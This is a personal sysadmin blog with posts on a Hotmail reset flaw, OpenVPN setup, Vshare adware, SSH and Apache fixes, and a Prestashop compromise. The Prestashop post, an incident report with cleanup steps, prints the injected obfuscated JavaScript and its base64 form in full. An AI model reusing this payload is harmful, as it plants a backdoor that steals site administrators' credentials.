HOW GEEK!

A vulnerability in the Hotmail password reset pages, that allowed hackers to get access to ANY hotmail/MSN account, has been widely exploited over the past week.

I found a video on Youtube dated April 12, which describes the security hole, which is trivial and only needs the modification of 1 email field during a request of the password reset page, when exploiting it , the password reset link would then be sent to an arbitrary email.

My MSN/passport.net accounts (and many of my contacts) have been hacked briefly during the night from April 17 to April 18, i then informed MSRC about an unknown vulnerability in the password reset page, and it seems the vulnerability was plugged on April 19 or 20.

What surprises me is the communication of Microsoft, there has been no public statement about the vulnerability, and all the hacked accounts have been permanently blocked and need to be unblocked manually by Microsoft employees. Some have been unblocked after asking on the forums answers.microsoft.com, but thousands remain blocked (every password reset, either through email, SMS or through the customer service don’t help).

We are on April 24 and most of the users don’t even know this is the fault of Microsoft and i’m surprised they didn’t bother to help the hacked customers to get back their accounts, this is another big disappointment about the Microsoft security, communication and ethics.

Other sites talking about the vulnerability:

http://syria.telecomix.org/

http://www.whitec0de.com/new-hotmail-exploit-can-get-any-hotmail-email-account-hacked-for-just-20/

http://hackingworldnews.blogspot.fr/2012/04/yet-another-hotmail-exploit-for-avril.html

UPDATE 26/04:

MSRC tweeted about the fix:

https://twitter.com/#!/msftsecresponse/status/195568235654021121

Got back my account after contacting the customer service, for this you need to follow the link on the page saying you’re blocked, and then login with a new (unblocked) account.. The mess ended.. At least, let’s hope so.

Here is the direct link to the correct support page:

http://windows.microsoft.com/en-us/windows-live/get-support?selectedproduct=Hotmail&selectedissue=Your%20account%20has%20been%20temporarily%20blocked&productKey=wolmain

UPDATE 28/03/2012: TheRegister has published an article about it and it seems MS decided to unban thepiratebay!

http://www.theregister.co.uk/2012/03/26/microsoft_censors_pirate_bay_im/

——–

Looks like thepiratebay.se links are blocked in MSN messenger, anybody who tries to send a link, even of the homepage, receives back an error:

I’d be curious to know if it has been mistakenly categorized as a site containing viruses or if it was a move from Microsoft to “hit” thepiratebay and the revenue they generate from visits.

Renting a server at Alvotech and thinking about installing OpenVPN? Then follow this tutorial.

This tutorial has been done on the default configuration of the Alvotech VPS: Debian 5 64bit, and on Debian 6 64bit.

The specs page of the vservers show that TUN/TAP is usable, but when you rent the VPS, no TUN interface is enabled.

The first thing is to ask the support to enable it, after they say they did, you need to reboot your server through the control panel.

Note that you don’t need any iptable rule, ip forwarding is enabled and you cannot add any iptable rule anyway, Alvotech will enable the necessary rules on the Host.

Then enter your server through ssh and check ifconfig, you might have something like this:

tun2391-136 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:10.0.2.97 P-t-P:10.0.2.98 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:11782 errors:0 dropped:0 overruns:0 frame:0
TX packets:8389 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:1258182 (1.1 MiB) TX bytes:5467118 (5.2 MiB)

Great, now do:

apt-get install openvpn

cd /etc/openvpn

mkdir easy-rsa

cp -r /usr/share/doc/openvpn/examples/easy-rsa/* easy-rsa/

cd easy-rsa/2.0/

source ./vars

./clean-all

./build-key-server server

./build-key client1

./build-dh

ln -s /etc/openvpn/easy-rsa/2.0/keys /etc/openvpn/keys

cd /etc/openvpn

Now create a file server.conf with this content:

port 1194
proto udp
dev tun2391-136 #Your TUN device in ifconfig
ifconfig 10.0.2.97 10.0.2.98 # your TUN interface settings in ifconfig
ifconfig-noexec
route-noexec
keepalive 10 120
persist-key
persist-tun
comp-lzo
verb 3
fragment 1200
mssfix 1200
ca keys/ca.crt
cert keys/server.crt
key keys/server.key
dh keys/dh1024.pem
user nobody
group nogroup
tls-server
push “dhcp-option DNS 8.8.8.8″

Restart openvpn:

/etc/init.d/openvpn restart

Now copy the ca.crt client1.crt and client1.key on your client, and create a client.conf file (or client.ovpn) with this content:

client
dev tun
proto udp
remote 88.88.88.88 1194 #your server ip address/port
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
ns-cert-type server
comp-lzo
verb 3
ifconfig 10.0.2.98 10.0.2.97 #change it according to the IPs of your TUN interface
redirect-gateway
fragment 1200
mssfix 1200

And now just run “sudo openvpn client.conf”, on Windows you might need to adjust the paths to something like this: “cert c:\\Users\\admin\\desktop\\client1.crt” (for the key+certs).

If you need another client to connect, just ask the support another TUN device (they added one on my server), copy server.conf to server2.conf, modify the TUN interface IPs/name + change the openvpn port in server2.conf, and don’t forget to generate a second client certificate!

Enjoy!

(thanks to the support @ Alvotech for providing the details i was missing)

Vshare plugin *IS* an adware.

Whether you are on Mac, Windows or Linux this is the same, and you don’t even need the toolbar, only the plugin.

I’ve installed the old version of the Vshare plugin on my Firefox, on Linux, (old version because the newest isn’t available on Linux) then some popups started to appear on sites like wikipedia.org, loaded from some files hosted on widdit.com,  and leading to search.searchcompletion.com (a quick lookup on Google shows some Windows users also see this site as their main browser page, after installing Vshare).

Widdit belongs to an Israeli company (SimplyGen), so does Vshare. Maybe both sites are from the same company.

At this point i don’t know if it only adds some random popups or also does other nasty things (like replacing ads). I didn’t read any other article on the subject, so i decided to write this post. If you have other info, post it in the comments!

Today i woke up and connected to a Prestashop site i’m setting up.
I didn’t install anything extra on it (only my custom template), also it wasn’t in search engines.
I noticed a strange blank line in the footer.. DOH!

When i looked, i had this code in the footer:

<script>String.prototype.asd=function(){return String.fromCharCode;};
Object.prototype.asd=”e”;try{for(i in{})if(~i.indexOf(‘as’))throw 1;}
catch(q){zxc={}[i];}v=document.createTextNode(‘asd’);
var s=”";for(i in v)if(i==’childNodes’)o=v[i].length+1;o*=2;e=eval;
m=[120-o,99-o,116-o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o
,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,
34-o,122-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,
113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-o,99-o,
118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o
,42-o,102-o,48-o,105-o,103-o,118-o,70-o,
99-o,118-o,103-o,42-o,43-o,49-o,52-o,43-o,45-o,59-o,57-o,
43-o,61-o,34-o,120-o,99-o,116-o,
34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,
104-o,116-o,113-o,111-o,69-o,106-o,
99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o
,103-o,118-o,74-o,113-o,119-o,116-o,
117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o
,119-o,111-o,103-o,112-o,118-o,
48-o,121-o,116-o,107-o,118-o,103-o,42-o,36-o,62-o,107-o,104-o
,116-o,99-o,111-o,103-o,34-o,
117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-o,60-o,49-o,
49-o,101-o,110-o,107-o,101-o,
109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,
107-o,110-o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,
41-o,34-o,121-o,107-o,102-o,118-o,
106-o,63-o,50-o,34-o,106-o,103-o,107-o,105-o,106-o,118-o,63-o,
50-o,64-o,36-o,43-o,61-o];
mm=”.asd();for(i=0;i<m.length;i++)s+
=mm(e(“m”+”["+"i"+"]“));e(s);</script>

And this in footer.tpl was causing it:

{literal}base64_decode(“PHNjcmlwdD5TdHJpbmcucHJvdG90eXBlL
mFzZD1mdW5jdGlvbigpe3JldHVybiBTdHJpbmcuZnJvbUNoYXJDb2RlO3
07T2JqZWN0LnByb3RvdHlwZS5hc2Q9ImUiO3RyeXtmb3IoaSBpbnt9KWl
mKH5pLmluZGV4T2YoJ2FzJykpdGhyb3cgMTt9Y2F0Y2gocSl7enhjPXt9
W2ldO312PWRvY3VtZW50LmNyZWF0ZVRleHROb2RlKCdhc2QnKTt2YXIgc
z0iIjtmb3IoaSBpbiB2KWlmKGk9PSdjaGlsZE5vZGVzJylvPXZbaV0ubG
VuZ3RoKzE7byo9MjtlPWV2YWw7bT1bMTIwLW8sOTktbywxMTYtbywzNC1
vLDEwMi1vLDM0LW8sNjMtbywzNC1vLDExMi1vLDEwMy1vLDEyMS1vLDM0
LW8sNzAtbyw5OS1vLDExOC1vLDEwMy1vLDQyLW8sNDMtbyw2MS1vLDEyM
C1vLDk5LW8sMTE2LW8sMzQtbywxMjItbyw2My1vLDg1LW8sMTE4LW8sMTE
2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbywxMDQtbywxMTYtbywxMTMt
bywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2LW8sNjktbywxMTMtbywxM
DItbywxMDMtbyw0Mi1vLDc5LW8sOTktbywxMTgtbywxMDYtbyw0OC1vLD
EwNC1vLDExMC1vLDExMy1vLDExMy1vLDExNi1vLDQyLW8sMTAyLW8sNDg
tbywxMDUtbywxMDMtbywxMTgtbyw3MC1vLDk5LW8sMTE4LW8sMTAzLW8s
NDItbyw0My1vLDQ5LW8sNTItbyw0My1vLDQ1LW8sNTktbyw1Ny1vLDQzL
W8sNjEtbywzNC1vLDEyMC1vLDk5LW8sMTE2LW8sMzQtbywxMjMtbyw2My
1vLDg1LW8sMTE4LW8sMTE2LW8sMTA3LW8sMTEyLW8sMTA1LW8sNDgtbyw
xMDQtbywxMTYtbywxMTMtbywxMTEtbyw2OS1vLDEwNi1vLDk5LW8sMTE2L
W8sNjktbywxMTMtbywxMDItbywxMDMtbyw0Mi1vLDEwMi1vLDQ4LW8sMTA
1LW8sMTAzLW8sMTE4LW8sNzQtbywxMTMtbywxMTktbywxMTYtbywxMTctby
w0Mi1vLDQzLW8sNDUtbyw1OS1vLDU3LW8sNDMtbyw2MS1vLDEwMi1vLDEx
My1vLDEwMS1vLDExOS1vLDExMS1vLDEwMy1vLDExMi1vLDExOC1vLDQ4L
W8sMTIxLW8sMTE2LW8sMTA3LW8sMTE4LW8sMTAzLW8sNDItbywzNi1vLD
YyLW8sMTA3LW8sMTA0LW8sMTE2LW8sOTktbywxMTEtbywxMDMtbywzNC
1vLDExNy1vLDExNi1vLDEwMS1vLDYzLW8sNDEtbywxMDYtbywxMTgtby
wxMTgtbywxMTQtbyw2MC1vLDQ5LW8sNDktbywxMDEtbywxMTAtbywxMD
ctbywxMDEtbywxMDktbywxMTEtbywxMDMtbywzNi1vLDQ1LW8sMTIyLW
8sNDUtbywxMjMtbyw0NS1vLDM2LW8sNDgtbywxMDQtbywxMDctbywxMT
AtbywxMDMtbyw5OS1vLDEyMC1vLDEwMy1vLDQ4LW8sMTAxLW8sMTEzLW
8sMTExLW8sNDEtbywzNC1vLDEyMS1vLDEwNy1vLDEwMi1vLDExOC1vLD
EwNi1vLDYzLW8sNTAtbywzNC1vLDEwNi1vLDEwMy1vLDEwNy1vLDEwNS1
vLDEwNi1vLDExOC1vLDYzLW8sNTAtbyw2NC1vLDM2LW8sNDMtbyw2MS1v
XTttbT0nJy5hc2QoKTtmb3IoaT0wO2k8bS5sZW5ndGg7aSsrKXMrPW1tK
GUoIm0iKyJbIisiaSIrIl0iKSk7ZShzKTs8L3NjcmlwdD4=”){/literal}

Also 2 PHP files were created in the upload/ and download/ folders which had the creation time set to the exact time i entered in the backend this morning!

Apparently, Prestashop.com got compromised and somebody inserted a malicious script, which was executed in any admin’s browser window and that would make him backdoor his own site.

All the infected shops employees’ credentials were sent to these malicious emails: samuvel_hitroy@aol.com and preop@gmx.com

The fix:
Be sure to delete modules/her.php
Remove the javascript code in the end of your footer.tpl theme files.
Be sure to create these folders:
tools/smarty/compile/
tools/smarty/cache/

Put back the htaccess files of upload/ and download/

You can clear *.php files from upload/ and download/

Clear ALL your cache.
Move your admin folder.
Reset your Mysql Password.
Reset all your employees’ passwords!

The vulnerability has been fixed on prestashop.com.

This shows how including external content (html) is really risky and should be avoided at all cost. External content should always be parsed and displayed safely.

More information on this thread:
http://www.prestashop.com/forums/topic/125798-footertpl-vulnerability/

UPDATE: Prestashop has published an official statement and published a tool to clean an infected site:

http://www.prestashop.com/blog/article/please_read_security_procedure/

I was searching for this fix for quite some time. I couldn’t forward X anymore using “ssh -Y” or “ssh -X” on my debian server (i have xauth installed), i was always getting this error:

~$ xterm
xterm Xt error: Can't open display:
xterm:  DISPLAY is not set

“X11UseLocalhost no” was making it working but this wasn’t the right solution..

On this bug report i found out i had the same problem and the same symptoms: i had disabled ipv6 support, and this is what broke the forwarding!

The solution is to add:

AddressFamily inet

in sshd_config! (or enable ipv6 again )

OK this is already everywhere on internet for years, but i really had to write a post about it as these guys are spamming my mailbox every year.

This company is trying to convince people into believing they need to renew (and obviously transfer) their domain names with them. Their paper looks very professional, and they are still active, which means they might be making some good money.

Here’s the envelop (click to see better):

And the letter:

Also their website is www.domainrenewalgroup.com (no way i hard-link this s***), and their former name was ”Domain Registry of America”.

Before reading this article, you should know that HTTP_X_FORWARDED_FOR should only be used for websites behind a proxy, otherwise you should use REMOTE_ADDR!! This article talks about getting the right visitor IP through HTTP_X_FORWARDED_FOR for applications behind a reverse proxy!

You might have faced it as it’s not so well documented. Note that i’m using nginx as reverse proxy, and this may not be the case with all the servers.

Yes HTTP_X_FORWARDED_FOR might return multiple IPs. And i’ve read multiple bogus statements on internet saying the first IP is the right one. This is incorrect.

The first IP may be the real client behind many proxies, but it can be fake (modified through headers).

So what is correct is to get the LAST IP from the list of IPs, which is the IP that connected to your (reverse) proxy, this is what you probably need in 99% of cases, trust me.

Here is the code in PHP:

$ip_array=explode(“,”, $_SERVER['HTTP_X_FORWARDED_FOR']);

$remoteip=trim($ip_array[count($ip_array)-1]);

Today i had to face a weird problem with Apache 2. I wanted to setup a webmail on the SAME virtualhost that i was using to proxy to another host.
Here’s a summary of my configuration:

<VirtualHost *:80>

ServerAdmin sysadmin@localhost

DocumentRoot /var/www/folder

ServerName localhost

Alias /mail /var/lib/roundcube/
<Directory /var/lib/roundcube/>

Options Indexes Includes FollowSymLinks

AllowOverride All

AuthType Basic

AuthUserFile /var/lib/roundcube/.htpasswd

AuthName “Protected Folder”

require valid-user

</Directory>
ProxyRequests Off

ProxyPreserveHost On
<Proxy *>

Order deny,allow

Allow from all

</Proxy>
ProxyPass /mail/ !

ProxyPass / http://0.0.0.0/ ttl=60 retry=0 status=I keepalive=on timeout=2500 disablereuse=on
</VirtualHost>

The problem is that the auth_basic wasn’t working correctly in this setup, Apache was answering with a 200 instead of a 401 message, which prevented the browser from understanding it was actually an authentication..

But this config was working fine without the auth, the webmail was working. And it was working fine with auth but no proxypass.
So what was wrong?! Thanks to the guys @freenode i discovered that Apache was proxying the requests to custom errors in /error/ (as i uncommented the custom errors in apache2.conf). The solution was to add:

ProxyPass /error/ !

Turn loglevel to debug in case you have a similar issue, in my case i could read this:

[Fri Mar 04 15:44:36 2011] [debug] mod_proxy_http.c(56): proxy: HTTP: canonicalising URL //10.10.10.10/error/HTTP_UNAUTHORIZED.html.var
[Fri Mar 04 15:44:36 2011] [debug] proxy_util.c(1506): [client 1.1.1.1] proxy: http: found worker http://10.10.10.10/ for http://10.10.10.10/error/HTTP_UNAUTHORIZED.html.var

Hope it helps.

I had to create a plugin for WPMU to allow users to add a Dailymotion Videowall in the sidebar.

It is available at this page: http://wordpress.org/extend/plugins/dailymotion-videowall-widget/

Stay tuned for a multi-language version!

Here’s the link if you want to donate: